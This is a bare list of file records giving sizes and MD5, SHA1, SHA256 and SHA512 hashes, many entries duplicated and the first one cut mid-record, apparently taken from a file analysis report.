SHA256973f851dfaf98617b3eb6fa38befeb7ede49bd993408917e207dc7ea399de326
SHA5129f0fb359a4291d47b8dc0ec789c319637dde0f09e59408c4d7fd9265e51c978aa3ba7ea51ca9524833814bca9e7978d9817658655ee339191634d4ae5f426ddc
-
Filesize
385KB
MD545abb1bedf83daf1f2ebbac86e2fa151
SHA17d9ccba675478ab65707a28fd277a189450fc477
SHA256611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
SHA5126bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c
-
Filesize
385KB
MD545abb1bedf83daf1f2ebbac86e2fa151
SHA17d9ccba675478ab65707a28fd277a189450fc477
SHA256611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
SHA5126bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c
-
Filesize
390KB
MD5b22cf896430a7bae5e38c51a7e0ac494
SHA186e6208697a0a52686a6227ccd15eeadad850e6a
SHA25622bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275
SHA512a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854
-
Filesize
390KB
MD5b22cf896430a7bae5e38c51a7e0ac494
SHA186e6208697a0a52686a6227ccd15eeadad850e6a
SHA25622bb5d2794525c5e92b4fefcab1231efa104203722fe54a01ccb9aa3f446f275
SHA512a1c7890257b6d31fc8df34357d1b8768e806f1f861b90101d5bea9c0bad5bc03c9bdbac3da76120840125e879f0d9f938e367c32d46feda2540f788d980f3854
-
Filesize
974KB
MD515777ae423417df86584aac2148b5d44
SHA1e5d89fc00ee12af8168b5ff7a947f2718f95ea6c
SHA2563873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5
SHA5129fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1
-
Filesize
974KB
MD515777ae423417df86584aac2148b5d44
SHA1e5d89fc00ee12af8168b5ff7a947f2718f95ea6c
SHA2563873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5
SHA5129fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1
-
Filesize
1.8MB
MD58e6f9cd063f15c66246c1def889860fd
SHA140d75fd878f3103a2949980f48525b8d221c0ed6
SHA25698f2f76e626b55fb471e5e9a830bc64ea4bbae565c3a554fea6970d8ffbede76
SHA512c0f44c98480b0540f075b7de4025b1a14fa6020f95372767fa59217656ab64a1f14ecff628c6056434fa19ac39c55e6215b77d79d4d5e68a8a09fd63805e83df
-
Filesize
1.8MB
MD58e6f9cd063f15c66246c1def889860fd
SHA140d75fd878f3103a2949980f48525b8d221c0ed6
SHA25698f2f76e626b55fb471e5e9a830bc64ea4bbae565c3a554fea6970d8ffbede76
SHA512c0f44c98480b0540f075b7de4025b1a14fa6020f95372767fa59217656ab64a1f14ecff628c6056434fa19ac39c55e6215b77d79d4d5e68a8a09fd63805e83df
-
Filesize
147KB
MD517e96c5b675aa027922e74cbde46b3aa
SHA1b7280ba769deadfeab7437235ad132fb9d144416
SHA25611f8751109321019dafea27c69978ce5eb97aea15953c1af3059442c7ffcde64
SHA512da2bcc6d10ac7deeadd3bc50e1e677a97d257559cb73a017a0c58cde0f8fde48103cb6cf4224d593f10a2c00e6760c5d07f6cf157cb745c470ce13a32bd4d932
-
Filesize
394KB
MD50b0a2a87f1c3baf76f3929078c0a1661
SHA1c14e735c3441dc5a8a043987955708a1f9c6d9a2
SHA25689ead50cf272732c685b4cbe67cb56cf0af035004c3db39bad5f68158045a01a
SHA512febf381f1eba30825c71a154c17f71370de2f9ef67e85f4ac1d4a84a36bef32183bd75a1333efdf57ca0bb2e73b784df098382f49e5c2e14e842ac6d2822e2f5
-
Filesize
394KB
MD50b0a2a87f1c3baf76f3929078c0a1661
SHA1c14e735c3441dc5a8a043987955708a1f9c6d9a2
SHA25689ead50cf272732c685b4cbe67cb56cf0af035004c3db39bad5f68158045a01a
SHA512febf381f1eba30825c71a154c17f71370de2f9ef67e85f4ac1d4a84a36bef32183bd75a1333efdf57ca0bb2e73b784df098382f49e5c2e14e842ac6d2822e2f5
-
Filesize
3.5MB
MD5022300f2f31eb6576f5d92cdc49d8206
SHA1abd01d801f6463b421f038095d2f062806d509da
SHA25659fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA5125ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe
-
Filesize
3.5MB
MD5022300f2f31eb6576f5d92cdc49d8206
SHA1abd01d801f6463b421f038095d2f062806d509da
SHA25659fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA5125ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe
-
Filesize
1.9MB
MD5b57d28ba7854b185f098a538af3b8e36
SHA1c36d58fcec162801c15768b78c36b1464e9cbb66
SHA256e64be99aa47e8f713b6189431159963c8c383563f6f0831a36d56991eefcf8ec
SHA512f74e9f42baed911d8a1f615f7ecddb63550519475e20c2f9b6b6cb76c6cf332bd89e3f3da731b529a29fb5c0111c7cfa48296e5daf9901585d98987c7e485a9d
-
Filesize
1.9MB
MD5b57d28ba7854b185f098a538af3b8e36
SHA1c36d58fcec162801c15768b78c36b1464e9cbb66
SHA256e64be99aa47e8f713b6189431159963c8c383563f6f0831a36d56991eefcf8ec
SHA512f74e9f42baed911d8a1f615f7ecddb63550519475e20c2f9b6b6cb76c6cf332bd89e3f3da731b529a29fb5c0111c7cfa48296e5daf9901585d98987c7e485a9d
-
Filesize
365KB
MD59b51aacc658896de78bbe14567334f2f
SHA172edbe5ad26bac081baf9dba2a5c4ff23e7e254d
SHA256f690c8889337ac8c3ebcbed491d3797cf1eee5e85493c985dee87778d1309281
SHA51282b47e8d278d8616414bb1d596be37120b8108283563e15a94ce4358c5a0066d47d4b4b7818be1e8f070949b82d4c645615947a2ab6a2c84d054042392f88429
-
Filesize
279KB
MD55163ae847dec4b423a4e9b1eb43d3864
SHA115e41ab0f8b44ae83baf879f04e60ff68f5959d1
SHA2564ac6ba19c72728768d7d070d3a00fe605a2a8500f0301b8a42028b702dafd430
SHA51284f9a42bbe81e837836b3eec3440174cfae66087ca8c9339999a52c80f4fcf13d44bec35c60a9d286fa3dfa54d2b48a9e3285de4257a018220294b601f775e2b
-
Filesize
279KB
MD55163ae847dec4b423a4e9b1eb43d3864
SHA115e41ab0f8b44ae83baf879f04e60ff68f5959d1
SHA2564ac6ba19c72728768d7d070d3a00fe605a2a8500f0301b8a42028b702dafd430
SHA51284f9a42bbe81e837836b3eec3440174cfae66087ca8c9339999a52c80f4fcf13d44bec35c60a9d286fa3dfa54d2b48a9e3285de4257a018220294b601f775e2b
-
Filesize
2.2MB
MD559bc91d7b08161cb0849afc21a442721
SHA105c5aec0cefc71f3f1bfffb7b3de88d813c92335
SHA256358fc61235ec7b1c4eb2c26716ca7cbb19bca7de64f5044d485fdfa1cefa2356
SHA512e5bfe6161b6f344cc7b9bd910d9002edadee613699185e9e591967bceca3b6d2f90cad37021f4a8e02e20bdd5670ed4314b019a70ee73c36d9c0d1b773ec42ee
-
Filesize
2.2MB
MD559bc91d7b08161cb0849afc21a442721
SHA105c5aec0cefc71f3f1bfffb7b3de88d813c92335
SHA256358fc61235ec7b1c4eb2c26716ca7cbb19bca7de64f5044d485fdfa1cefa2356
SHA512e5bfe6161b6f344cc7b9bd910d9002edadee613699185e9e591967bceca3b6d2f90cad37021f4a8e02e20bdd5670ed4314b019a70ee73c36d9c0d1b773ec42ee
-
Filesize
10.2MB
MD54aa2ed3cbbc9843b66715959adf53589
SHA1f52474066e53f13ea9eff8144c2c9ed17318ba98
SHA256336c28695850bb8182b8a1baed4c64ca5aff7b35cb8fcbcdb954a9b9c709b640
SHA51298366485496f6f3ce81ada5578ddc7a580e902a75a728f4d14e7c79d15df6b4104f0eed3a09e06e48113666d918abdb1ad78ef5d9595c78ea19c495b9a66b744
-
Filesize
10.2MB
MD54aa2ed3cbbc9843b66715959adf53589
SHA1f52474066e53f13ea9eff8144c2c9ed17318ba98
SHA256336c28695850bb8182b8a1baed4c64ca5aff7b35cb8fcbcdb954a9b9c709b640
SHA51298366485496f6f3ce81ada5578ddc7a580e902a75a728f4d14e7c79d15df6b4104f0eed3a09e06e48113666d918abdb1ad78ef5d9595c78ea19c495b9a66b744
-
Filesize
10.2MB
MD54aa2ed3cbbc9843b66715959adf53589
SHA1f52474066e53f13ea9eff8144c2c9ed17318ba98
SHA256336c28695850bb8182b8a1baed4c64ca5aff7b35cb8fcbcdb954a9b9c709b640
SHA51298366485496f6f3ce81ada5578ddc7a580e902a75a728f4d14e7c79d15df6b4104f0eed3a09e06e48113666d918abdb1ad78ef5d9595c78ea19c495b9a66b744
-
Filesize
732KB
MD5a7f0db730ffc25346b807b44e22d76e2
SHA12cd65e498430b3a083437bbb004c85194743fcba
SHA2562e7b5d0e19e55b6a2874d14c700d53949ffdbd02f51bf617d1a92dbaf8521f3d
SHA512a101b64f8660c9d9392811c2ba7745863065b8c498955362e7df56de7d1b3ed5a488ec70941baf748095bba2ea85d6fb04ab3901c72ad5742d3d3791380cfb8b
-
Filesize
732KB
MD5a7f0db730ffc25346b807b44e22d76e2
SHA12cd65e498430b3a083437bbb004c85194743fcba
SHA2562e7b5d0e19e55b6a2874d14c700d53949ffdbd02f51bf617d1a92dbaf8521f3d
SHA512a101b64f8660c9d9392811c2ba7745863065b8c498955362e7df56de7d1b3ed5a488ec70941baf748095bba2ea85d6fb04ab3901c72ad5742d3d3791380cfb8b
-
Filesize
401KB
MD522922137714e5791617bc3c9710615b6
SHA178cff80d5ab75b845272c728429446f0807b5ad4
SHA256f49c22644ec5e45d9188a8727dc2f7750dd5e23bbcb0d24e2455aa7a2ecc1952
SHA512ca87db57dd91064ef830e3f465dbc970e76f6f7c60612abbf8f08d1dd93186aac560be3853e09e93bd50ee436f9ecf51ae5d17bbd0565448e73f12af49e6bd00
-
Filesize
401KB
MD522922137714e5791617bc3c9710615b6
SHA178cff80d5ab75b845272c728429446f0807b5ad4
SHA256f49c22644ec5e45d9188a8727dc2f7750dd5e23bbcb0d24e2455aa7a2ecc1952
SHA512ca87db57dd91064ef830e3f465dbc970e76f6f7c60612abbf8f08d1dd93186aac560be3853e09e93bd50ee436f9ecf51ae5d17bbd0565448e73f12af49e6bd00
-
Filesize
1.7MB
MD5f8d8b67dfcec2684e96122cb9aea4daf
SHA139ea9ffed4bba9db6635b4aa1a38f79d6a9062b7
SHA256083e66dc1b7fe9c08ccf244b0620896bfef6f23ad9f9468456d7587aaebc95b5
SHA51255405c02c17508250be84461dd527163a53224c34147b51d1dc84d6dd028a6aae5bd8ac9e6be81882fbf2adf9851b2f425e71f9b32ea2df1f2fabfac21fe10c6
-
Filesize
1.7MB
MD5f8d8b67dfcec2684e96122cb9aea4daf
SHA139ea9ffed4bba9db6635b4aa1a38f79d6a9062b7
SHA256083e66dc1b7fe9c08ccf244b0620896bfef6f23ad9f9468456d7587aaebc95b5
SHA51255405c02c17508250be84461dd527163a53224c34147b51d1dc84d6dd028a6aae5bd8ac9e6be81882fbf2adf9851b2f425e71f9b32ea2df1f2fabfac21fe10c6
-
Filesize
4.5MB
MD5c7a7b834e68cece0ac292bc991af7908
SHA1bf22bead8421057fe31242b1cd1c6d87b1f4cbdc
SHA256954cd93ab4f96ea2d6c6eacc796ed2657e50dcc1e5646665067f5c06835b86a4
SHA5125e1c5119951eb061c2dc3d9abc65f9e501e11dde6c5a2b7f5494937f602828069969d09c318efe51b2a405b16f2e36cef24ffadd173d3e33f473bf7efce50bc3
-
Filesize
4.5MB
MD5c7a7b834e68cece0ac292bc991af7908
SHA1bf22bead8421057fe31242b1cd1c6d87b1f4cbdc
SHA256954cd93ab4f96ea2d6c6eacc796ed2657e50dcc1e5646665067f5c06835b86a4
SHA5125e1c5119951eb061c2dc3d9abc65f9e501e11dde6c5a2b7f5494937f602828069969d09c318efe51b2a405b16f2e36cef24ffadd173d3e33f473bf7efce50bc3
-
Filesize
391KB
MD5be4cd92e14c0d3235ecaf4f10d7aa68a
SHA1ddc908db9c225329c836244feec47b8b2e5d989d
SHA25605fbe015ae3610d931f7d3a0d188fc34f95b60de008116a2d57db248ccef7f28
SHA512473e1eab87b6ea8c58b7291e23aee84927bfa02825819c9725b070e92349ec2dc2749cd49facdc33334117609b49b1c9fddcf94a4d99d5a36a20ec5b11a6502a
-
Filesize
391KB
MD5be4cd92e14c0d3235ecaf4f10d7aa68a
SHA1ddc908db9c225329c836244feec47b8b2e5d989d
SHA25605fbe015ae3610d931f7d3a0d188fc34f95b60de008116a2d57db248ccef7f28
SHA512473e1eab87b6ea8c58b7291e23aee84927bfa02825819c9725b070e92349ec2dc2749cd49facdc33334117609b49b1c9fddcf94a4d99d5a36a20ec5b11a6502a